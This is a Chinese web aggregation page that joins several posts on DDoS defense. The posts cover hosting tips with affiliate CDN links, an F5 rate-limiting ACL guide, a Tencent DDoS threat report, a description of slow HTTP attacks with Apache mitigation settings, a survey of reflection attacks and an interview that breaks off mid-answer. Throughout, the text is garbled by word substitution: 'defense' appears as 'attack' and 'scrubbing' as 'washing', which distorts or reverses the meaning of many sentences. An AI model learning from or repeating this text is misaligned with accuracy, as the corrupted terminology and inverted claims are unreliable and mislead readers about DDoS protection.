关于ddos:网站如何预防黑客DDOS攻击DDOS攻击如何防御

网站经营过程中DDoS攻打是最难缠的,被DDOS的网站会呈现拜访卡,拜访慢,甚至呈现服务器连贯中断,以致长时间无奈关上,一些服务器商甚至会要求网站主把网站移走。 所以,网站预防黑客DDOS攻打很重要,明天主机吧就来教大家如何进攻DDOS攻打。 1.应用高配置的服务器 高配置的服务器是所有进攻DDOS攻打的根底,DDOS攻打中有一种7层的CC攻打,是以耗费CPU占有率为伎俩,如果服务器配置过低,那么对方很容易CC攻打你,所以倡议服务器CPU内存要高,最高4核起步。 2.选用优化好的网站程序 主机吧发现一些网站程序运行起来占用CPU十分高,已经有一位用户,应用了wordpress,但没有做任何优化,导致一点击链接,2核的服务器就间接满了,这样的程序是非常容易被CC攻打的,只有被C一下服务器就挂了,基本不须要什么老本,所以肯定要优化好网站程序,放弃程序运行占CPU不高于30%。 3.关掉不必要的服务器端口 黑客有一种工具专门是扫描服务器端口的,扫描服务器端口的目标是为了入侵服务器,很多支流云服务商的IP都有被扫,比方阿里云、腾讯云,主机吧的服务器就是在腾讯云的,运行两年多,被扫了几千次,十分恐怖,所以肯定要关掉非必要的服务器端口,保留80、443网页端口即可,这能够大大预防黑客攻击。 4.尽量暗藏网站联系方式 如果你是企业网站、营销站的,那能够跳过这一条,暗藏联系方式的起因是一些巧取豪夺攻打个别都会通过联系方式分割上你,如果找不到你联系方式,可能会放弃攻打,毕竟没有人闲得蛋疼。 5.暗藏源服务器IP 这个很重要,一般的服务器是没有能力进攻DDOS攻打的,比方腾讯云、阿里云,只收费进攻5G的DDOS攻打,一但超过攻打量,服务器IP会被拉入黑洞,所有业务间接进行,影响重大。而个别的DDOS攻打是须要服务器IP作为攻打对象的,所以一但暗藏起来,对方无奈找到源IP,天然无奈DDOS攻打到你了,无形中曾经缩小了被DDOS的概率。不过DDOS攻打中还有一种7层CC攻打,这种攻打是通过域名攻打的,域名是没方法暗藏的,这个时候咱们须要应用高防CDN来进行进攻。 高防CDN不仅能够网站暗藏源服务器IP,同时能够拦挡7层CC攻打,也能够进攻DDOS攻打,还能够对网站进行减速拜访,是网站预防DDOS攻打的不二之选,这里主机吧举荐应用百度云减速和京东云星盾。 百度云减速 百度云减速是百度旗下为网站提供一站式减速、平安防护和搜索引擎优化的产品。提供四到七层的DDoS攻打防护,包含CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量荡涤+CC进攻+WEB攻打拦挡,组合过滤准确辨认,无效进攻各种类型攻打。 优惠链接https://www.zhujib.com/yunjia... 京东云星盾SCDN 京东云星盾SCDN平安减速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式平安进攻产品,提供收费 SSL 证书,集成 Web 攻打防护、CC 攻打进攻、BOT 机器人剖析,并将内容散发减速能力融于一身。在边缘节点注入平安能力,造成分布式的平安减速网络,让您的业务更平安、体验更晦涩。实用于所有兼顾平安和内容减速的业务。 优惠链接:https://www.zhujib.com/jdxing... 好了,以上就是主机吧对如何预防DDOS攻打的一些见解,如果你有什么不懂的都能够征询主机吧。

January 19, 2023 · 1 min · jiezi

关于ddos:如何使用-F5-分布式云快速轻松地配置快速-ACL-DDoS防护

Ted Byerly  职位:员工 公司:F5 简介 本文将向大家展现如何轻松创立“疾速 ACL” 以爱护您的利用免受 DDoS 攻打。三至四层的 DDoS 防护也将包含在 F5 分布式云服务当中。 制订 DDoS 防护策略必须从多个层面动手。这意味着企业须要应用多种工具和功能模块来爱护本身平安,并确保基础架构和利用的失常运行。这种分层办法采纳网络防火墙进行三到四层的 DDoS 防护,并应用 Web 利用防火墙 (WAF) 执行七层防护。本文将介绍可提供速率限度的访问控制列表 (ACL),亦称为“疾速 ACL”。 这些 ACL 策略在数据门路入口解决的晚期阶段就将被利用,造成抵挡攻打的第一道防线。 典型用例如下 对流向目标的流量进行速率限度 承受从某些源 IP 到目标的流量 对从某些源 IP 到目标的流量进行速率限度或抛弃 这些策略对进入零碎(入向)的每个数据包进行评估,与基于会话的 ACL 不同,只在会话的第一个数据包上计算动作。 它按照数据包的五元素{目的地 IP、目的地端口、源 IP、源端口、协定}来指定。 这有助于您依据网络基础架构和利用性能对 DDoS 防护策略进行精密的调整。 开始工作 登录 F5 分布式云服务平台。 抉择 Cloud and Edge Sites 栏目。 导航到 Manage >> Firewall >> Fast ACLs(治理 >> 防火墙 >> 疾速 ACL) ...

September 15, 2022 · 2 min · jiezi

关于ddos:腾讯安全发布2021年全球DDoS威胁报告DDoS威胁成犯罪团伙首选勒索手段

后疫情时代,企业对数字化工具需要减少,用户生存生产习惯向线上转移,互联网行业迎来继续高速增长。同时,DDoS攻打因溯源难度大,勒索成本低,产业链条成熟成为犯罪团伙首选勒索伎俩。在过来一年中,除了DDoS攻打次数持续增长,业界最大的DDoS攻打流量更是被推高至2.54Tb。 一图读懂DDoS威逼六大趋势 近日,腾讯平安联结绿盟科技公布《2021年寰球DDoS威逼报告》(以下简称《报告》),基于对2021年监测到的数据状况进行统计分析,全面盘点了2021年寰球DDoS攻打倒退态势。《报告》指出,DDoS攻打峰值及大流量攻打产生的次数持续增长,攻打手法和行业散布出现多元化,攻击方式较以往对防护系统性能和灵敏性要求更高,弹性应答成为DDoS攻防要害。 关注腾讯平安(公众号TXAQ2019) 回复2021DDoS获取原报告 黑产猖狂,Tb级攻打时代已逾5年自DDoS攻打峰值在2016年迈入Tb级攻打时代后,Tb级攻打已逾5年,超百G大流量攻打持续增长,出于巧取豪夺目标的DDoS攻打更是层出不穷,俨然成为犯罪团伙首选勒索伎俩,严重威胁企业平安。《报告》发现,2021年下半年DDoS攻打威逼大于上半年,其中黑产攻打顶峰也呈现在下半年。 一方面,随着物联网、5G网络、云计算等新一代信息技术的广泛应用,大量IoT设施或IDC服务因破绽修复不及时沦为肉鸡。另一方面,监管加码使得大量基于矿机挖矿的企业迁徙海内,利用肉鸡进行挖矿的黑产也受到较大冲击,大量肉鸡从挖矿畛域回流进入DDoS攻打黑产。黑客的攻打资源的大幅减少,让下半年DDoS攻打峰值也水涨船高,仅7月份就屡次攻打冲破Tb级,腾讯云T-SecDDoS防护防护团队屡次胜利防护Tb级别的DDoS攻打,最大攻打流量为1.26Tb。 除了贬低大流量攻打次数和峰值,黑客发动的大流量攻击方式也有所变动。《报告》指出,2021年有相当比例的超百G大流量DDoS攻打是由SYN大包或UDP反射之外的手法发动的。这意味着,百G以上大流量攻打的攻打手法呈显著多元化趋势。 同样出现多元化趋势的还有海内与国内攻打行业散布状况。二者攻打热点行业高度重合,攻打排名第一的行业均为游戏行业。此外,云计算、视频直播等行业占比也较多。 威逼加剧,高频刹时攻打防不胜防在黑产视角,2021年80%的DDoS攻打时长在5分钟以内,刹时攻打占比高。黑产团伙次要靠扩充僵尸网络规模晋升DDoS打击能力,利用时差攻打乘虚而入,防不胜防。 除了攻打流量增长快、隐没快、攻打密集的脉冲攻打会让企业平安运维人员不堪其扰,在僵尸网络助推下,近年来衰亡的扫段攻打对企业平安的危害也不容小觑。 扫段攻打产生时,被攻打IP变动迅速,局部IP上的攻打持续时间可能仅有数秒,但流量却能迅速增长到上百G。同时,如果检测零碎和防护系统提早较大,响应不及时,可能会导致攻打漏检以及防护透传。久远而言,高频刹时攻打可能重大影响指标的服务质量,无效管制攻打老本,尽快耗尽DDoS进攻服务人员精力,给企业平安防护带来更大挑战。 策略降级,智能调度成DDoS攻防要害以后数字经济与实体经济减速交融,DDoS攻打带来的平安挑战也逐渐降级。量级、强度的继续晋升,新型攻打手法的不断涌现,都让当下的网络安全态势更加严厉。 在这一背景下,企业更要针对高危业务进行常态化防护,晋升DDoS攻打监测和响应灵敏度和精密度,通过监测防护系统智能调度,以更敌对的防护体验保障企业业务平安。 腾讯平安基于二十多年海量业务平安实际和黑灰产反抗教训,依靠遍布寰球的秒级提早响应和T级荡涤能力,打造了腾讯云T-Sec DDoS防护解决方案。通过IP画像、行为模式分析、Cookie挑战等多维算法,联合AI智能引擎继续更新防护策略,可弹性应答从网络层到应用层的各类型DDoS攻打场景,保障毫秒级网络稳固和秒级荡涤切换,可能在保障业务不受影响的状况下,将荡涤准确度进步至99.995%。 目前,腾讯云T-Sec DDoS防护曾经为游戏、金融、互联网、政府等多个行业的客户提供了平安保障。 将来,腾讯平安将继续施展本身的技术、人才和服务劣势,冲破技术屏障,充分利用AI、算法、水印、设施指纹等多种形式,帮忙企业构建新一代防护体系,继续护航产业数字化。

January 20, 2022 · 1 min · jiezi

关于ddos:什么是慢速攻击如何防御慢速CC攻击

1)什么是慢速攻打 一说起慢速攻打,就要谈谈它的成名历史了。HTTP Post慢速DoS攻打第一次在技术社区被正式披露是2012年的OWASP大会上,由Wong Onn Chee 和 Tom Brennan独特演示了应用这一技术攻打的威力。 这个攻打的基本原理如下:对任何一个凋谢了HTTP拜访的服务器HTTP服务器,先建设了一个连贯,指定一个比拟大的content-length,而后以非常低的速度发包,比方1-10s发一个字节,而后维持住这个连接不断开。如果客户端继续建设这样的连贯,那么服务器上可用的连贯将一点一点被占满,从而导致拒绝服务。 和CC攻打一样,只有Web服务器凋谢了Web服务,那么它就能够是一个靶子,HTTP协定在接管到request之前是不对申请内容作校验的,所以即便你的Web利用没有可用的form表单,这个攻打一样无效。 在客户端以单线程形式建设较大数量的无用连贯,并放弃继续发包的代价十分的低廉。理论试验中一台一般PC能够建设的连贯在3000个以上。这对一台一般的Web server,将是致命的打击。更不用说联合肉鸡群做分布式DoS了。 鉴于此攻打简略的利用水平、拒绝服务的结果、带有逃逸个性的攻击方式,这类攻打一炮而红,成为泛滥攻击者的钻研和利用对象。 2)慢速攻打的分类 倒退到明天,慢速攻打也多种多样,其品种可分为以下几种: Slow headers:Web利用在解决HTTP申请之前都要先接管完所有的HTTP头部,因为HTTP头部中蕴含了一些Web利用可能用到的重要的信息。攻击者利用这点,发动一个HTTP申请,始终不停的发送HTTP头部,耗费服务器的连贯和内存资源。抓包数据可见,攻打客户端与服务器建设TCP连贯后,每30秒才向服务器发送一个HTTP头部,而Web服务器再没接管到2个间断的\r\n时,会认为客户端没有发送完头部,而继续的等等客户端发送数据。Slow body:攻击者发送一个HTTP POST申请,该申请的Content-Length头部值很大,使得Web服务器或代理认为客户端要发送很大的数据。服务器会放弃连贯筹备接收数据,但攻打客户端每次只发送很大量的数据,使该连贯始终放弃存活,耗费服务器的连贯和内存资源。抓包数据可见,攻打客户端与服务器建设TCP连贯后,发送了残缺的HTTP头部,POST办法带有较大的Content-Length,而后每10s发送一次随机的参数。服务器因为没有接管到相应Content-Length的body,而继续的期待客户端发送数据。 Slow read:客户端与服务器建设连贯并发送了一个HTTP申请,客户端发送残缺的申请给服务器端,而后始终放弃这个连贯,以很低的速度读取Response,比方很长一段时间客户端不读取任何数据,通过发送Zero Window到服务器,让服务器误以为客户端很忙,直到连贯快超时前才读取一个字节,以耗费服务器的连贯和内存资源。抓包数据可见,客户端把数据发给服务器后,服务器发送响应时,收到了客户端的ZeroWindow提醒(示意本人没有缓冲区用于接收数据),服务器不得不继续的向客户端收回ZeroWindowProbe包,询问客户端是否能够接收数据。应用较多的慢速攻打工具有:Slowhttptest和Slowloris。3)哪些服务器易被慢速攻打 慢速攻打次要利用的是thread-based架构的服务器的个性,这种服务器会为每个新连贯关上一个线程,它会期待接管残缺个HTTP头部才会开释连贯。比方Apache会有一个超时工夫来期待这种不齐全连贯(默认是300s),然而一旦接管到客户端发来的数据,这个超时工夫会被重置。正是因为这样,攻击者能够很容易放弃住一个连贯,因为攻击者只须要在行将超时之前发送一个字符,便能够缩短超时工夫。而客户端只须要很少的资源,便能够关上多个连贯,进而占用服务器很多的资源。 教训证,Apache、httpd采纳thread-based架构,很容易蒙受慢速攻打。而另外一种event-based架构的服务器,比方nginx和lighttpd则不容易蒙受慢速攻打。4)如何防护慢速攻打 Apache服务器当初应用较多的有三种简略防护形式。 mod_reqtimeout:Apache2.2.15后,该模块曾经被默认蕴含,用户可配置从一个客户端接管HTTP头部和HTTPbody的超时工夫和最小速率。如果一个客户端不能在配置工夫内发送完头部或body数据,服务器会返回一个408REQUEST TIME OUT谬误。配置文件如下: < IfModule mod_reqtimeout.c >RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500 < /IfModule >mod_qos:Apache的一个服务质量管制模块,用户可配置各种不同粒度的HTTP申请阈值,配置文件如下: < IfModule mod_qos.c > /# handle connections from up to 100000 different IPsQS_ClientEntries 100000 /# allow only 50 connections per IPQS_SrvMaxConnPerIP 50 /# limit maximum number of active TCP connections limited to 256MaxClients 256 /# disables keep-alive when 180 (70%) TCP connections are occupiedQS_SrvMaxConnClose 180 /# minimum request/response speed (deny slow clients blocking the server, keeping connections open without requesting anythingQS_SrvMinDataRate 1501200 < /IfModule >mod_security:一个开源的WAF模块,有专门针对慢速攻打防护的规定,配置如下: ...

December 13, 2021 · 1 min · jiezi

关于ddos:DDoS攻击愈演愈烈反射攻击举足轻重

0x00概述寰球DDoS网络攻击次数一直增长,反射攻打次数也是逐年回升,笔者在之前撰写的文章《史上最大DDoS攻打"之争"》中提到的几次”最大”攻打,都是以CLDAP为主的反射攻打。除了CLDAP反射攻打外,SSDP、NTP等反射攻打也是历年来最为风行的攻打类型,最近几年一直有新的攻打类型被发现,行业内监测到的反射类型有50多种,其中智云盾团队针对其中12种做了首次技术剖析和攻打预警。 0x01反射攻打态势DDoS攻打峰值和攻打频率一直增高,反射攻打的占比从2017年的21%,增长到2021年靠近50%,下图展现了DDoS攻打次数与反射攻打增长的趋势。图1 DDoS攻打与反射攻打趋势(数据起源:百度平安年报) 统计2021上半年DDoS攻打类型占比,udp反射攻打领有高达38.85%的占比,相较于2020年同期回升显著。图2 2021上半年攻打类型占比 统计反射攻打类型TOP6的数据,SSDP、NTP、SNMP、Memcache、DNS和CLDAP是最为沉闷的反射攻打。图3 2021上半年反射型攻打TOP6 其中CLDAP是近年来较火的攻打类型,业内披露的屡次T级以上的超大攻打,都有CLDAP攻打的参加,CLDAP协定广泛应用于Windows服务器的流动目录服务(AD),反射放大倍数超过70倍。 0x02反射攻打原理原理如下图所示:图4 反射攻打原理示意图 图中攻击者Attacker伪造了申请包Pva发送到反射服务器Amplifiers(简称A),但Pva的源IP是受害者Victim(简称V),所以A响应的时候发送Pav给到V,Pav往往是Pva的好几倍,甚至是成千上万倍。反射攻打一方面暗藏了黑客IP,同时还有一个重要特色是放大攻打流量。 1)暗藏黑客IP黑客施行攻打时,不是间接攻打受害者IP,而是伪造受害者IP的大量申请发给相应的凋谢服务,相应服务将大量的歹意流量发送给受害者,这样就产生的暗藏了发送者实在身份的成果。有一种状况是国内三大运营商的边缘网络或路由器会查看源IP,对不是同一网络的IP出向包进行抛弃。针对这种状况,黑客会在应用相应伎俩储备攻打资源,下图展现了BillGates木马收集的过程。 图5 BillGates木马上图中序号19、20两个包中红色打码的是BillGates木马用实在IP收发心跳包,序号21和22是木马伪造不同的IP段发包,payload中记录了实在IP。木马收到申请包后依据payload是否蕴含实在IP来确定哪些IP段能够用于伪造。BiillGates木马通过收发心跳包来确定哪些IP段是能够将伪造的申请顺利通过边缘网络或路由器发到主控端。 2)放大攻打流量反射攻打风行的另一个重要起因是反射服务带有放大成果,这些服务应用的协定通常不对起源申请进行安全性校验,间接响应数倍乃至数万倍于申请的数据包,例如咱们熟知的Memcache反射攻打,最大的放大倍数可达十几万倍。很多出名的服务都能够用作反射攻打,如:NTP、SNMP,行业内监测到的50多种攻打类型中就有21种利用了物联网协定,7种游戏协定,16种网络服务以及6种公有协定,这些反射攻打的放大倍数少则几倍,多则高达十几万倍,这些反射攻打的放大倍数少则几倍,多则高达十几万倍,甚至payload为空的的状况下,也能响应超量数据包。 0x03攻防反抗咱们在长期与DDoS黑客”打交道”中,提炼出一套高效精确的钻研识别方法,该办法包含两个方面: 1)监测进攻零碎智云盾在寰球部署了大量节点,蕴含一些蜜罐节点,能够有机会观测到反射攻打的全过程。图6 新型反射攻打发现 当黑客伪造的反射申请对监控零碎进行攻打时,监测节点实时上报攻打事件到威逼核心,向全网节点下发采集被攻打IP地址的指令,深度包分析程序依据IP对应关系提取黑客应用新型反射攻打的申请指令。应用这种办法,咱们辨认了多个新型反射攻打类型,如CoAP、PMDP等反射攻打,然而因为资源无限,依然有许多新型类型难以辨认。于是咱们提出了基于协定模板fuzz的反射源攻打手法自动化探测办法。 2)基于协定模板fuzz的反射源攻打手法自动化探测办法应用RFC协定库,构建协定模板库,通过fuzz算法生成大量的反射申请数据包。对于捕捉到大量响应包的反射攻打,通过协定模板库,fuzz辨认协定类型,精准生成协定类型。图7生成反射申请包 辨认协定时: 如果协定载荷为文本——可打印的ASCII字符,抉择简略协定分类的模版库进行比对,采纳文本相似性算法如果协定载荷为简单协定——二进制数据和偶然蕴含的人可读的ASCII字符串,抉择简单协定的模版库进行比对,采纳二进制构造相似性算法。应用基于生成generation-based的fuzz技术,对生成的协定进行文本建模,基于模型生成申请数据包。这样可能高效的获取新型反射攻打的申请指令。 3)研究成果自2018年首次发现IPMI反射攻打以来,咱们累计挖掘出12种新型反射放大攻打,同时也对业内风行的TCP反射攻打进行过深入研究,下表展现了咱们近年来在反射攻打畛域的研究成果。 0x04反射攻打汇总黑客在寻找新的攻击方式上不再拘泥于传统公共服务,而是对裸露在公网,并且具备肯定规模的UDP服务都尝试利用作为反射源。咱们联合了本人的研究成果以及查阅多方材料,对反射攻打类型进行了总结,后果如下表: 注:表格迷信倍数数据为平安专家计算得出,局部数据联合业内披露的信息,未查问到相干信息的局部留白 0x05进攻措施反射攻打都是互联网上凋谢服务参加的,作为这些凋谢服务的运营者应遵循以下进攻措施防止成为DDoS反射攻打的鹰犬。 能应用TCP的服务,尽量不要启用UDP服务必须应用UDP服务时,应启用受权认证应用UDP服务无奈启用受权认证时,应确保响应与申请的倍数不要大于1加强本身应答歹意申请的能力,及时封禁歹意IP点击进入理解更多技术常识~~

September 3, 2021 · 1 min · jiezi

关于ddos:产业安全专家谈-从攻防两端视角看DDoS的应对策略

2020年能够说是DDoS这一“经典”攻打技术的振兴之年。受寰球新冠疫情的重大影响,DDoS攻打的量级也在一直加大,业内蒙受DDoS攻打的频率创下了新高。过来一年,DDoS攻打的手法变得多样化,超过50Gbps的攻打数量也急剧减少。对于许多行业和企业来说,抗D之路任重道远,还有更加严厉的安全形势须要面对。 那么,2020年成为DDoS攻打增幅最大的一年,起因何在?DDoS攻打走势与疫情防控局势显著相干,其关联度体现在哪里?腾讯平安抵挡DDoS攻打的外围劣势是什么?由腾讯平安联结云+社区打造的「产业平安专家谈」第二十七期邀请到腾讯平安DDoS防护技术总监、研发负责人罗喜军,深度解读《2020年腾讯云DDoS威逼白皮书》的重点内容,并分享腾讯平安在抗D路上的实战经验。 Q1:《白皮书》提到,2020年是DDoS攻打增幅最大的一年,其背地起因是什么? 罗喜军:咱们能够从攻击者视角来看这个问题。首先,从志愿、动机的角度来看,去年突发的新冠疫情,给人们的生存形式带来了微小的变动,很多流动都从线下切换到了线上,同时带来了互联网服务的高速倒退。业务高速倒退,就会给黑产攻击者带来更多可乘之机,他们的获利空间变大; 第二,在于攻击者的能力,即资源。近几年IoT、5G等基础设施在疾速倒退,与此同时,平安问题也会随同产生,比方弱口令或者一些破绽问题,很容易引发黑客攻击,使得设施沦为“肉鸡”,导致DDoS攻打; 而且,当初DDoS攻打还有一个趋势,就是它的攻打逐步工具化,当初叫做攻打的SaaS化服务,它能让攻击者的门槛变低。假如在网页上注册账号,只有点一下鼠标或者调用API接口就能够发动攻打; 此外,疫情也会使攻击者的动机变强。疫情刺激需要,需要带来资源,资源又在一个继续的增长过程中,而持续增长的资源在动机的强烈驱动下,就可能令攻击者更好地利用资源。 综上,攻打动机跟攻打资源这两个因素使得20年的攻打趋势有了很大的增长。 Q2: DDoS攻打走势与疫情防控局势显著相干,其关联度体现在哪里? 罗喜军:数据当中体现的关联度在于,疫情期间大家都宅在家里,线上业务暴发,这时对于黑产团伙来说,就是一个绝佳的攻打机会,势必比居家隔离前的时段获利更大、成果更显著。 举一个更简略的例子,游戏。在凌晨或中午,很少有人去玩,所以此时对攻击者来说,他们是没有太大能源去作恶的,因为用户越少,获利越低;反之,在游戏高峰期,比方早晨七八点或者中午,此时在线用户多,如果这时发动攻打,会让攻击者获取更大的利益,对用户和游戏行业也都能造成更大的影响。 Q3: 游戏行业依然是次要被攻打行业。2020年游戏行业因DDoS攻打造成的威逼有多大?国内的游戏企业受到的影响是否重大? 罗喜军:游戏行业始终都是DDoS威逼的一个重灾区,数据显示,2020年游戏行业攻打占比已达78%,较2019年回升28%。这个起因在于,受DDoS攻打的区域跟与游戏行业的高度倒退是比拟符合的,放在寰球范畴看也是一样的,也就是说,游戏行业对DDoS攻打感触到的影响是最显著的。 举例说明,一个玩家在游戏过程中受到攻打,有可能简略卡顿一下,也有可能间接掉线,再重连就连不上了,此时玩家对产品的体验以及产品自身的口碑都会受到很大影响。 而且,国内的游戏企业在出海时也会遇到同样的问题,在海内可能会遇到更加顽劣的环境。一方面是海内黑产团伙的能力有可能更强,另一方面是在海内想要采取溯源等措施兴许会更加艰难。 因而,国内的游戏在出海过程中受DDoS攻打的影响会更大,比方近几年很常见的巧取豪夺,以及一些不正当的竞争,甚至是有些玩家在游戏中歹意牟取利益,都会影响游戏行业。目前对于黑产来说,DDoS攻打仍然是他们的习用伎俩。 Q4: 去年呈现了新型的UDP反射攻打,起因是什么?为什么这些新型的反射攻打仍然集中在游戏行业? 罗喜军:其实UDP的反射攻打是一个比拟老的攻打手法了,但去年咱们还是看到UDP反射这里有一些新状况。去年7月有研究者发现,黑客通过几种新的IoT设施,利用UDP反射手法发动攻打,而后美国FBI就对这一威逼进行了一次平安预警,通报给了美国企业,导致黑产理解到这一手法,那么它就会大范畴地应用这种手法,这也是7月份之后占比偏高的起因,映射出UDP攻打手法的一些变动。 为什么还是游戏?有几个起因,第一,游戏要保障很好的用户体验,须要放弃低延时,所以在网络协议开发下面永远都会采纳UDP协定,UDP反射正好也是用UDP协定,其实两个场景下协定是雷同的;第二,新的UDP反射手法与以往不同,以往的可能会有一个反射比,发十几字节的小包之后产生几百字节的攻打包,造成流量放大。然而这几种UDP手法,它的包长不算特地大,它的包长与失常游戏协定的行为包长大小是差不多的,包含咱们看到黑客应用的攻打源也是这种,比方家外面的路由器或者一些其余的智能设施。从服务端来看,这些IP就是失常用户的IP,因为就是从家庭网络进去的。所以从防护端的角度来看,这几个层面就导致咱们很难进攻这样的一些状况,或者说它对于进攻零碎的挑战会变大。因为攻击者也喜爱以假乱真的成果,所以就会变本加厉,一旦发现他冲破这个点,就会大肆应用这种货色。 Q5: 在平安情报的披露下面,要披露到什么水平会比拟适合? 罗喜军:这个问题更多的是站在防护者视角,或者说以正向的视角去披露。因为咱们不能披露做好事的手法,而是要通知大家,做好事的手法咱们是把握的,抑或是在防护的过程中,也能同时解决平安问题。 然而作为防守端,并不代表咱们能够去滥用平安情报的披露手法,而是在于对状况的掌控。对于整个大盘来说,包含攻防两端,咱们都能把握威逼情报,也正是体现了咱们的业余能力。 Q6: TCP反射攻打威逼继续扩充,起因是什么? 罗喜军:TCP反射是近两三年才呈现的一个新手法,它在前一两年更多的是利用网上开源的Web服务,例如依附通用的CDN来进行反射。从去年开始,办公局势发生变化,通用的CDN曾经不能满足攻打需要了,于是就开始利用DNS设施,包含其余智能设施来发动。 这个跟UDP反射会有一些差异,UDP反射更多是心愿反射发动流量放大,达到四两拨千斤的成果;而TCP反射没有显著的放大比,没法放大流量,然而能够让包量或者PPS达到很大的水平。包量或者PPS参数对于网络设备或防护设施的性能体验挑战是比拟大的,这也是TCP反射攻打的威逼比UDP反射更难解决的起因所在,它所造成的PPS包量吞吐量会比拟大,这对于咱们设施的性能来说是很大的考验。 另外,TCP反射应用的是一个失常的通信协议栈,它还是以假乱真,失常的协定栈很难去区别对待,到底是失常用户?还是一个攻击者?这一利用点会给咱们的防护体系和防护策略带来更高的挑战。所以不法黑客更加违心利用从简到难的形式,缓缓用UDP反射,再到TCP反射,一步步增强,一步步试图冲破。 Q7:《白皮书》显示,应用层攻打出现海量化趋势,这个点指的是什么? 罗喜军:去年咱们捕捉到一例靠近300万QPS的加密流量攻打,之前捕捉的最大规模也就几万,这其实是一个几十倍的增长。咱们发现加密流量的威逼忽然间变大,应用层的威逼也随之突增,而后再增。还有一个乏味的点,这些攻打源应用的都是秒拨IP,即秒拨代理IP,它是说在业务平安畛域,欺诈、黄牛、薅羊毛的场景可能会比拟多地用到秒拨IP,因为它不停切换,必须绕过咱们的风控策略。 咱们发现秒拨IP曾经利用于传统的平安反抗畛域,如果还是以IP的角度去做拦挡防护,就会有很多弊病,因为秒拨IP的个性就是不停地变,如果再用旧办法反抗它,就会发现咱们永远落后于攻击者,永远都是在被他人打了一波之后再去剖析。 Q8:XOR.DDoS僵尸网络最为沉闷,起因有哪些? 罗喜军:XOR僵尸网络是比拟经典的一个僵尸网络,曾经10多年了,这个僵尸网络感化Linux服务器,通过明码爆破或者弱口令的形式去感化,感化之后在下面种植木马后门,外面会种植一个DDoS攻打工具,这个攻打工具会被相似的“肉鸡”退出到好人的僵尸网络,去发动对外攻打。这个攻打手法是最经典的手法,其实就是SYNFLOOD,而且是SYN大包攻打,个别单个网络的规模应该是在100~300G左右,去年下半年因为IoT这种设施的倒退,所以活跃度在下半年也会变大。 去年12月份,咱们在一个开源的软件供应链外面发现有僵尸网络通过投毒的形式进行流传,这相对来说还是比拟大的、新的趋势。以往的流传可能还是通过黑客去黑新“肉鸡”,管制“肉鸡”,而后上传木马、后门,上传工具,发动攻打,但过后咱们发现软件园的安全监控外面,它通过伪造某一个软件供应链里的一个软件,在外面捆绑一个后门,一旦在用开源软件搭建本人的业务体系时,发现这个软件是被投毒的,那机器可能也就被种上了这样的木马。 Q9:与今年相比,腾讯2020年抗D最重点的技术晋升方向是哪些?成果如何? 罗喜军:第一,降本增效。咱们一直地去研发高性能的防护设施和计划,去升高在设施上的投入老本。比方以往可能更多的是单台设施,能进攻10G的流量,到去年咱们曾经开始迈入到百G甚至400G的区段,这样投入老本就会降落,运维、经营效率也会随之进步。 第二,加盟提效。通过跟一些合作伙伴独特建设平安能力,把平安能力凋谢给客户。而后就是在算法层面的继续降级,咱们以往的反抗模式可能还是比拟传统,比方写规定、写特色,然而在攻打手法复杂化或者强反抗的背景下,这样的办法就会越来越局限,所以咱们也是在不停地利用大数据或者机器学习算法,去晋升策略的可配置性或灵活性,心愿可能更加智能、自动化地去解决一些高级别的攻打手法。 至于成果如何,就是产品的付费老本可能会降落,或者说雷同老本上,能买到更多的高防能力,这是一个,因为老本是客户重点考量的因素;第二,因为平安攻防永远是一个继续反抗的过程,而且技术的降级在于反抗效率的晋升,比方以往呈现一个攻打手法,可能要花上三五天能力帮客户解决,当初只有一天甚至半天,或者只须要调一个配置,就能解决这个问题,效率会大幅晋升,客户的受影响工夫也会大大缩减。 Q10:腾讯平安为客户提供了什么样的增量能力和解决方案? 罗喜军:咱们之前推出了一个计划叫做“AI防护”,以前没有它的时候,当一个攻打手法变动时,通常的模式是,客户业务受损时,平安团队通过剖析来调整和更新策略,这样一来可能会耗上几小时甚至更久;而在推出“AI智能防护”这种高级性能之后,客户只须要在页面上点一下,就能够主动分析攻击手法的变动,自动识别和调整策略,可能只有几分钟工夫,大量业务就能复原,这是一个点。 Q11:在黑灰产的攻打伎俩一直降级时,作为防守方,咱们要如何跑在后面? 罗喜军:第一,咱们的威逼情报能力要求咱们要把很多事件做到事先,不要被动挨打,而是被动去控盘,所以咱们对于业界的威逼变动会有一个及时的捕捉、感知; 第二,对于腾讯自有的业务来说,尤其是自有的游戏业务,其实也会存在这样大的威逼,包含腾讯云的客户。比方a客户发现了一些问题,可能及时感知到,咱们就能把这个问题放到整个大盘下来思考;如果b客户也发现问题,就不会很被动地解决,这就体现了咱们的威逼情报能力; 另外一点是后端的技术能力。当一个新的问题呈现后,技术迭代能很快解决问题并适应这一情况。其实咱们所有后盾零碎都是自研的,自研带来的一个益处是可控性好,定制化的效率也会很高。当有需要或者遇到攻打之后,可能很快实现迭代降级,这也依赖于后盾的技术模型,毕竟要反对这么快的迭代成果。 Q12:抵挡DDoS畛域最须要的外围能力是什么,咱们的外围劣势又是什么? 罗喜军:第一,咱们具备多年的技术积淀和积攒。因为平安有业余门槛,可能这里不存在捷径;另一个层面,腾讯领有许多业务,具备海量、全新的互联网业务模型,还包含腾讯云用户的实战论断,这里指的是放到实战当中,跟好人去肉搏之后,能力晓得应该怎么打,这是咱们在技术上的一些劣势; 第二,资源优势。因为DDoS很大水平还是在于资源的配套,像腾讯平安的产品领有的后端资源储备,比方带宽资源储备,BGP网络的储备等,咱们各个业务的状态都能为用户提供很高的防护带宽和能力,这是资源优势; 第三,平安服务。比方客户呈现问题须要解决时,咱们可能疾速反对和响应,帮忙客户正向解决问题。 Q13:将来有哪些行业可能会成为DDoS攻打的高发畛域,如果这些行业须要提前部署、提前应答的话,应该通过哪些方面来建设本身的行业体系? 罗喜军:实践上看,所有互联网业务都会存在DDoS攻打的可能,因为它不像是破绽或者入侵,破绽跟入侵是说本身存在弱点,坏人才有机会进来;但DDoS是说,只有在网上就存在这种可能,因为网络可达就会存在这个问题,而且DDoS的攻打成果是最显著的,就是让用户断网,同时给业务造成负面影响。 将来,在一些新兴行业当中,可能会存在这种平安危险。比方在线教育,网络断了,学生就没法上网课;或者是在线医疗,这是真正与生命严密相连的,所以会有很大的危险存在。对于此类行业的客户或企业主来说,咱们的倡议是: 第一,企业本身要具备抗攻击能力。如同普通人得感冒,或者不是全靠吃药来解决问题,而是身材首先要具备肯定的抵抗力。同理,业务首先要在程序、代码开发、架构等方面具备肯定的抗攻击能力; 